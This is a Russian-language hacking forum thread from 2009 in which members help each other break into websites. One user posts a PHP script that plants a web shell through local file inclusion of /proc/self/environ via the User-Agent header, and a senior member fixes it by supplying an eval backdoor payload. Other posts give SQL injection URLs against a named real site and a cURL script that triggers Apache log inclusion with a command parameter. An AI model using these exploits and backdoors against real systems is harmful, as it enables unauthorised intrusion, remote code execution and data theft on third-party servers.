
16.12.2009, 00:19
|
|
Banned
Регистрация: 02.12.2009
Сообщений: 23
С нами:
8653381
Репутация:
-55
|
|
PHP код:
<?php
$host = "www.ыаывпывпыпывпп";
$port = 80;
$script = "/index.php?page=../../../../../../../proc/self/environ";
$shell = file_get_contents("shell.php");
$sock = fsockopen($host,$port);
if(!$sock)
echo "Error";
else
{
$head = "POST $script HTTP/1.1\r\n";
$head .= "Host: $host\r\n";
$head .= 'User-Agent: <?php fwrite(fopen("shell.php","w+"),$shell) ?>'."\r\n";
$head .= "Accept-Language: ru\r\n";
$head .= "Content-Type: application/x-www-form-urlencoded\r\n";
$head .= "Content-Lenght: ".strlen($shell)."\r\n";
$head .= "\r\n$shell\r\n";
fwrite($sock,$head);
while(!feof($sock))
{
$respons .= fgets($sock,1024);
}
fclose($sock);
}
?>
почему не работает? на сайте создаётся пустой файл (без кода)
|
|
|

16.12.2009, 01:02
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от Matnya
PHP код:
<?php
$host = "www.ыаывпывпыпывпп";
$port = 80;
$script = "/index.php?page=../../../../../../../proc/self/environ";
$shell = file_get_contents("shell.php");
$sock = fsockopen($host,$port);
if(!$sock)
echo "Error";
else
{
$head = "POST $script HTTP/1.1\r\n";
$head .= "Host: $host\r\n";
$head .= 'User-Agent: <?php fwrite(fopen("shell.php","w+"),$shell) ?>'."\r\n";
$head .= "Accept-Language: ru\r\n";
$head .= "Content-Type: application/x-www-form-urlencoded\r\n";
$head .= "Content-Lenght: ".strlen($shell)."\r\n";
$head .= "\r\n$shell\r\n";
fwrite($sock,$head);
while(!feof($sock))
{
$respons .= fgets($sock,1024);
}
fclose($sock);
}
?>
почему не работает? на сайте создаётся пустой файл (без кода)
потому что php-скрипт, прописанный в user-agent, выполняется на стороне сервера (в чем и есть суть уязвимости), а ты пытаешься взять содержимое шелла со своего компьютера, а скрипт, записанный в user-agent, ищет файл на сервере, есс-но не находит и просто создает пустой файл. Вывод - все, что ты хочешь записать в файл - пиши прямо в php-код в user-agent, например <?if (isset($_REQUEST[data_time])) eval(stripslashes($_REQUEST[data_time]));?>
PS: Представляешь, чтобы было, если бы работало так, как ты хочешь? Я написал php-скрипт на сервере и читаю любой файл на ТВОЕМ компе? )))
Последний раз редактировалось Pashkela; 16.12.2009 в 01:07..
|
|
|

16.12.2009, 01:17
|
|
Banned
Регистрация: 02.12.2009
Сообщений: 23
С нами:
8653381
Репутация:
-55
|
|
Сообщение от Pashkela
потому что php-скрипт, прописанный в user-agent, выполняется на стороне сервера (в чем и есть суть уязвимости), а ты пытаешься взять содержимое шелла со своего компьютера, а скрипт, записанный в user-agent, ищет файл на сервере, есс-но не находит и просто создает пустой файл. Вывод - все, что ты хочешь записать в файл - пиши прямо в php-код в user-agent, например <?if (isset($_REQUEST[data_time])) eval(stripslashes($_REQUEST[data_time]));?>
PS: Представляешь, чтобы было, если бы работало так, как ты хочешь? Я написал php-скрипт на сервере и читаю любой файл на ТВОЕМ компе? )))
спс. щас буду фиксить. я просто думал что интерпритатор, сам вместо той переменной подставит код, который в ней. а он это ХЗ почему не сделал.
UDP: Аааааааааааа всё допёр.
|
|
|

16.12.2009, 00:28
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
Сообщение от Micr0b
http://dev.rssportal.ru/catalog/57'+order+by+1/*
dev.rssportal.ru/catalog/1111111111111111'1'union(select(null)from(select(1 ))a)
как то так
/add
или так
http://dev.rssportal.ru/catalog/1111111111111111'1'and(1)=version()::int
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
Последний раз редактировалось l1ght; 16.12.2009 в 00:35..
|
|
|

16.12.2009, 01:03
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
слышал про http method:seccomp но везде говорят одинаково и нету подробного обьяснения
|
|
|

16.12.2009, 03:46
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от YuNi|[c
слышал про http method:seccomp но везде говорят одинаково и нету подробного обьяснения
http://labs.securitycompass.com/index.php/exploit-me/access-me/access-me-faq/
https://addons.mozilla.org/en-US/firefox/addon/7595
примерный перевод:
Последней версией Доступа - Меня является Деяние - Меня, инструмент имел обыкновение проверять некоторую уязвимость доступа, связанную с веб-приложениями. Инструмент работает, посылая несколько версий последнего запроса страницы. Запрос с удаленной сессией пошлют. Запрос, используя глагол ГОЛОВЫ HTTP и запрос, израсходовав сделанный глагол SECCOM пошлют. Комбинацию сессии и HEAD/SECCOM также пошлют.
В общем всех пошлют
|
|
|

16.12.2009, 06:17
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от Pashkela
http://labs.securitycompass.com/index.php/exploit-me/access-me/access-me-faq/
https://addons.mozilla.org/en-US/firefox/addon/7595
примерный перевод:
В общем всех пошлют
как я понял нету разумного обьяснения во всем рунете!!!
|
|
|

16.12.2009, 16:29
|
|
Новичок
Регистрация: 07.11.2009
Сообщений: 23
С нами:
8688843
Репутация:
10
|
|
Можно ли провести здесь скулю?
PHP код:
$res=mysql_query("update peolpe set name='".$_POST."' where id='".$_POST."'");
Переменные name и id не фильтруются...
|
|
|

16.12.2009, 01:53
|
|
Banned
Регистрация: 02.12.2009
Сообщений: 23
С нами:
8653381
Репутация:
-55
|
|
Такой вопрос. На сайте есть инклуд логов апача. Логи очень большие по ходу. можно ли написать скрипт на пыхе со спецальными заголовками. чтобы он проинлудил лог, а ответ не дожидал. потому что когда я в браузере инклужу большой лог, то у меня всё висит. подскажите плиз
|
|
|

16.12.2009, 01:59
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
PHP код:
<?php
@set_time_limit(0);
@ini_set("display_errors","1");
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Opera foreva');
curl_setopt($ch, CURLOPT_REFERER, "http://www.lala.jp");
$ss=curl_exec($ch);
curl_close($ch);
return $ss;
}
$a=get('http://site.ru/index.php&file=../../../../../../../logs/error.log&cmd=copy.......;');
#echo $a;
echo 'ok';
?>
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|